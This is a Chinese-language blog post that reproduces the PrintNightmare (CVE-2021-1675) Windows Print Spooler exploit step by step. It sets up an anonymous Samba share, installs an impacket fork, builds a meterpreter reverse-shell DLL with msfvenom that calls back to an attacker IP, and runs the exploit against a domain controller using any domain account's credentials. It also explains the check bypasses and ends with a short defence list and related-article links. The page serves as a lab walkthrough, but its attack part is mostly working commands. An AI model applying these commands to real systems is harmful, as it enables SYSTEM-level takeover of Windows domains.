cve-2021-1675复现

最新推荐文章于 2022-05-24 21:09:49 发布
最新推荐文章于 2022-05-24 21:09:49 发布
阅读量1.8k 收藏 9
点赞数 2
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/118575509
版权

文章目录

1. 参考文章

CentOS7搭建Samba共享文件夹 设置无密码登录
exp:
cube0x0/CVE-2021-1675

2. 环境配置

2.1 samba配置

需要有一台linux机器,配置可无密码访问的共享文件夹。
下载samba:

sudo apt-get remove samba-common  
sudo apt-get remove libwbclient0
sudo apt-get install samba
apt-get install samba-client
yum install -y samba samba-client #centOS
apt-get

下面为配置文件/etc/samba/smb.conf需要修改的地方:

[global]
    security=user
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[test] 
comment = share 
path = /tmp/ 
public = yes 
browseable = yes 
writable = yes 
guest ok = yes 
create mask = 0777 
directory mask = 0775 
guest ok = yes

2.2 特殊的impacket配置

在攻击机上还需装cube0x0的impacket包,具体命令如下:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

3. 漏洞复现

条件:

  1. 域内任意账户的用户名密码
  2. 域控ip
  3. 可被域控匿名访问的共享文件夹

3.1 使用msf生成恶意dll并开启监听

注意:只能使用64位的dll文件,否则会发现,dll可以上传但不会被执行

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.1 LPORT=9999 -f dll -o y.dll

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.124.1 -P 9999

3.2 上传恶意dll到共享文件夹内

 scp y.dll root@192.168.124.7:/tmp/

3.3 使用exp进行利用

其中test为域的名字,zhangsan:123分别是域控任意用户的账号密码,192.168.124.142是域控ip。 后面的\192.168.124.7\test\y.dll为smb可访问的unc路径,也是共享文件的路径。

python3 CVE-2021-1675.py test/zhangsan:123@192.168.124.142  "\\\192.168.124.7\test\y.dll"

4. 利用成果:

在这里插入图片描述

防御方法

  1. 关闭打印机服务
  2. 在组策略中设置无法访问不需要认证的共享文件夹。

在这里插入图片描述

5. 原理

整体大概是通过RpcAddPrinterDriverEx函数上传一个驱动,然后再用system权限加载这个驱动。

  1. RpcAddPrinterDriverEx #绕过告警
    RpcAddPrinterDriverEx的第三个参数dwFileCopyFlags改为APD_INSTALL_WARNED_DRIVER后,我们可以无视告警安装打印机驱动。

  2. ValidateDriverInfo #绕过文件签名检查
    标志位设置为APD_INSTALL_WARNED_DRIVER即可逃过检查。

  3. CreateInternalDriverFileArray #绕过建立驱动文件目录函数
    在FileCopyFlags中设置APD_COPY_FROM_DIRECTORY(0x10),即可跳过spool目录检查。

  4. 修改dll文件版本号绕过驱动文件兼容性检查
    可以修改待加载驱动或dll文件的版本号为3,从而绕过驱动兼容性检查。

  5. CopyFileToFinalDirectory #加载驱动文件
    函数执行完成后,我们的驱动文件以及依赖就被复制到驱动目录了,复制后的驱动文件会被自动加载。

Shanfenglan7
关注
专栏目录
微软通杀漏洞-CVE-2021-1675复现
Ms08067安全实验室
08-19 2469
文章来源|MS08067安全实验室本文作者:龙诺(Web知识星球追洞小组)一 准备环境实验环境:windows2019 (192.168.189.145) kali linux (192...
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
m0_56642842的博客
07-26 3300
0x00 简介 微软6月发布的安全更新补丁中包括了一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 0x01 漏洞概述 Print Spooler是Windows系统中管理打印相关事务的服务,用于管理所有本地和网络打印队列并控制所有打印工作。Windows系统默认开启
微软漏洞 Cve-2021-1675复现
weixin_42345596的博客
07-07 3195
受影响版本 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Ser
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
漏洞复现|PrintNightmare(CVE-2021-1675复现
weixin_42282189的博客
01-05 5414
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 环境准备 一个普通权限的域账户 目标开启.
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2428
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
【技术分享】cve-2021-1675-windows提权复现以及详细分析
weixin_45062925的博客
05-24 883
1、漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 Github公布的地址...
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 687
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5147
CVE-2021-1675
CVE-2021-1675(Windows Print Spooler 远程代码执行漏洞)
子曰小玖的博客
09-07 2591
0x00 漏洞详情 Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利
CVE-2021-1675】Windows Print Spooler RCE
weixin_39664643的博客
07-29 737
【漏洞复现】Windows Print Spooler RCE 前言 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。 若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx
CVE-2021-28041复现
最新发布
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值